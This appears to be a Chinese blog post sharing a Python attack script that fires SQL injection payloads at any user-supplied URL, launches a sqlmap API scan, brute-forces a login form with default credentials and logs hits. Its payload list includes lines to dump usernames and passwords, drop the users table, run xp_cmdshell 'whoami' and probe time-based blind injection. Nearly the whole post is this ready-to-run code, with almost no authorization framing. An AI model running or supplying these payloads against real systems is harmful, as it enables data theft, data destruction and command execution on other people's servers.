阅读量:0
两个版本改进功能如下:
- 自动化暴力破解功能:尝试使用常见的用户名和密码组合来测试登录页面。
- 探测响应时间:为布尔盲注的 SQL 注入,测量响应时间来检测延迟。
- 数据提取功能:尝试提取数据库的版本和表结构。
- 结果日志:将扫描结果记录到文件中,以便分析。
import requests import json import time # SQLMap API URL SQLMAP_API_URL = "http://localhost:8775/ajax" # SQL 注入测试样本列表 SQL_INJECTION_PAYLOADS = [ "'", # 单引号引发基本的 SQL 错误 '"', # 双引号引发基本的 SQL 错误 "' OR '1'='1' --", # 典型的真语句注入 "' OR '1'='1' /*", # 使用注释符号进行注入 "' OR 1=1 --", # 另一种基本的真语句注入 "' OR 1=1 /*", # 另一种基本的真语句注入,使用评论 "' UNION SELECT NULL, username, password FROM users --", # 使用 UNION 查询 "' UNION SELECT 1, @@version --", # 获取数据库版本 "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --", # 字符串获取 "' HAVING 1=1 --", # HAVING 子句测试 "'; DROP TABLE users; --", # 尝试删除表 (仅供测试目的,切勿在生产环境中执行) "'; EXEC xp_cmdshell('whoami'); --", # SQL Server 命令执行 "'; SELECT * FROM information_schema.tables; --", # 获取表信息 "' AND 1=(SELECT COUNT(*) FROM users) --", # 计数测试 "'; SELECT concat(username, ':', password) FROM users --", # 获取用户名和密码组合 "'; WAITFOR DELAY '0:0:5'; --", # 基于延迟的盲注测试 "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --", # 使用 CASE 语句 "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --", # 多个 NULL 测试 "' AND EXISTS(SELECT * FROM users WHERE username='admin') --", # 检查用户是否存在 "'; SELECT @@datadir; --", # 获取数据库目录信息 "' AND ascii(substring((SELECT password FROM users WHERE username='admin'),1,1)) > 100 --", # 通过字符编码进行盲注 ] # 确保在代码中使用时将此列表作为您的 SQL 注入负载引用 # Credentials for brute force testing CREDENTIALS = [ ('admin', 'password123'), ('admin', 'admin'), ('user', 'user123'), ] # Function settings LEVEL = 2 # SQLMap scan level RISK = 2 # SQLMap risk level def log_results(file_name, data): """Log results to a file.""" with open(file_name, 'a') as f: f.write(data + '\n') def start_scan(target_url): data = { 'url': target_url, 'level': LEVEL, 'risk': RISK, } try: response = requests.post(f"{SQLMAP_API_URL}/task/new", data=data) response.raise_for_status() task_info = response.json() if task_info.get('status') == 'success': task_id = task_info['taskid'] print(f"Created task: {task_id}") response = requests.post(f"{SQLMAP_API_URL}/scan/{task_id}") response.raise_for_status() scan_info = response.json() if scan_info.get('status') == 'success': print(f"Started scan for task: {task_id}") while True: response = requests.get(f"{SQLMAP_API_URL}/scan/{task_id}") response.raise_for_status() scan_result = response.json() if scan_result.get('status') in ['terminated', 'done']: print("Scan completed.") break elif scan_result.get('status') == 'running': print("Scan is still running...") else: print("Error retrieving scan status.") break time.sleep(5) response = requests.get(f"{SQLMAP_API_URL}/scan/{task_id}/data") response.raise_for_status() results = response.json() if results: print("Scan results:") print(json.dumps(results, indent=4)) log_results("scan_results.log", json.dumps(results, indent=4)) else: print("No results found for the scan.") else: print("Failed to start scan.") else: print("Failed to create task.") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") except json.JSONDecodeError: print("Failed to decode JSON response.") except KeyError as e: print(f"Missing key in response: {e}") def test_sql_injection(target_url): print("Testing for SQL injection vulnerabilities...") for payload in SQL_INJECTION_PAYLOADS: inject_url = f"{target_url}{payload}" print(f"Testing payload: {inject_url}") try: response = requests.get(inject_url) if response.status_code == 200: if "SQL syntax" in response.text or "error" in response.text.lower(): print(f"Possible SQL injection vulnerability found with payload: {payload}") log_results("sql_injection_results.log", f"Vulnerable payload: {payload}") else: print(f"No vulnerability found with payload: {payload}") else: print(f"Received unexpected status code: {response.status_code} for payload: {payload}") except requests.exceptions.RequestException as e: print(f"Request failed for payload {payload}: {e}") def brute_force_login(target_url): print("Attempting to brute force login...") for username, password in CREDENTIALS: data = { 'username': username, 'password': password, } try: response = requests.post(target_url, data=data) if "Invalid username or password" not in response.text: # adjust this condition based on the actual response print(f"Successful login with {username}:{password}") log_results("brute_force_results.log", f"Successful login: {username}:{password}") break else: print(f"Failed login with {username}:{password}") except requests.exceptions.RequestException as e: print(f"Request failed for {username}:{password}: {e}") def response_time_check(target_url): print("Checking for blind SQL injection via response time...") # Example method to check for response timing, may need adjustment based on target payload = "' OR IF(1=1, SLEEP(5), 0) -- " inject_url = f"{target_url}{payload}" start_time = time.time() try: response = requests.get(inject_url) end_time = time.time() if response.status_code == 200: response_time = end_time - start_time print(f"Response time: {response_time}s") if response_time > 5: print("Possible SQL injection vulnerability detected due to delayed response.") log_results("timing_attack_results.log", "Possible SQL injection vulnerability due to timing.") else: print(f"Received unexpected status code: {response.status_code} for timing check.") except requests.exceptions.RequestException as e: print(f"Request failed for timing check: {e}") if __name__ == "__main__": target_url = input("Please enter the target URL (with parameters, if necessary): ") # 测试 SQL 注入 test_sql_injection(target_url) # 启动 SQLMap 扫描 start_scan(target_url) # 垂直暴力破解 brute_force_login(target_url) # 响应时间检查 response_time_check(target_url)
改进点说明:
暴力破解功能:
- 添加了
brute_force_login
函数,尝试使用预定义的用户凭证进行登录尝试。
- 添加了
响应时间检查:
- 增加了
response_time_check
函数,用于检测盲注并测试 SQL 注入的可能延迟。
- 增加了
日志记录:
- 每个功能都添加了日志记录,便于后续分析。扫描结果、暴力破解结果和响应时间都被写入对应的日志文件中。